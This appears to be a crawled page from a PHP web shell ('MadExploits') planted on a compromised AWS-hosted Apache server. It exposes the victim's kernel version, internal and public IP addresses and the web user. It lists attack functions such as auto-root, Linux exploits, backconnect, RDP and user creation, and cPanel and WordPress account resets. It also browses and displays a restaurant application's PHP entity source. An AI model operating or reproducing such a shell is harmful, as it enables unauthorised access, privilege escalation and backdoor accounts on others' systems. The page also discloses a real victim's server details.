Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.12.136.98
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
src /
Entity /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
0
B
-rw-rw-r--
Activity.php
2.09
KB
-rw-rw-r--
Customer.php
1.79
KB
-rw-rw-r--
Groups.php
1.83
KB
-rw-rw-r--
Inventory.php
1.4
KB
-rw-rw-r--
Item.php
4.52
KB
-rw-rw-r--
ItemPart.php
2.29
KB
-rw-rw-r--
OrderItem.php
3.3
KB
-rw-rw-r--
Orders.php
4.78
KB
-rw-rw-r--
Stock.php
2.74
KB
-rw-rw-r--
Subscription.php
2.75
KB
-rw-rw-r--
Supplier.php
3.45
KB
-rw-rw-r--
Supply.php
3.23
KB
-rw-rw-r--
SupplyItem.php
2.95
KB
-rw-rw-r--
Transaction.php
2.34
KB
-rw-rw-r--
Users.php
7.53
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Supplier.php
<?php namespace App\Entity; use Doctrine\ORM\Mapping as ORM; use Doctrine\Common\Collections\Collection; use Doctrine\Common\Collections\ArrayCollection; /** * Supplier * * @ORM\Table(name="supplier") * @ORM\Entity(repositoryClass="App\Repository\SupplierRepository") */ class Supplier { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") */ private $id; /** * @var string * * @ORM\Column(name="name", type="string", length=255) */ private $name; /** * @var string * * @ORM\Column(name="address", type="string", length=255, nullable=true) */ private $address; /** * @var int * * @ORM\Column(name="telephone", type="string", length=255, nullable=true) */ private $telephone; /** * @var string * * @ORM\Column(name="email", type="string", length=255, nullable=true) */ private $email; /** * @var int * * @ORM\Column(name="user_id", type="integer", nullable=true) */ private $userId; /** * @var Collection * * @ORM\OneToMany(targetEntity="App\Entity\Supply", mappedBy="supplier") */ private $supply; function __construct() { $this->supply = new ArrayCollection(); } /** * Set userId * * @param int $userId * * @return Groups */ public function setUserId($userId) { $this->userId = $userId; return $this; } /** * Get userId * * @return int */ public function getUserId() { return $this->userId; } /** * Get id * * @return int */ public function getId() { return $this->id; } /** * Set name * * @param string $name * * @return Supplier */ public function setName($name) { $this->name = $name; return $this; } /** * Get name * * @return string */ public function getName() { return $this->name; } /** * Set address * * @param string $address * * @return Supplier */ public function setAddress($address) { $this->address = $address; return $this; } /** * Get address * * @return string */ public function getAddress() { return $this->address; } /** * Set telephone * * @param integer $telephone * * @return Supplier */ public function setTelephone($telephone) { $this->telephone = $telephone; return $this; } /** * Get telephone * * @return int */ public function getTelephone() { return $this->telephone; } /** * Set email * * @param string $email * * @return Supplier */ public function setEmail($email) { $this->email = $email; return $this; } /** * Get email * * @return string */ public function getEmail() { return $this->email; } /** * Get Supplies * * @return ArrayCollection */ public function getSupply() { return $this->supply; } /** * Remove Supplies * * @return ArrayCollection */ public function removeSupplies() { return $this->supply->clear(); } }
Close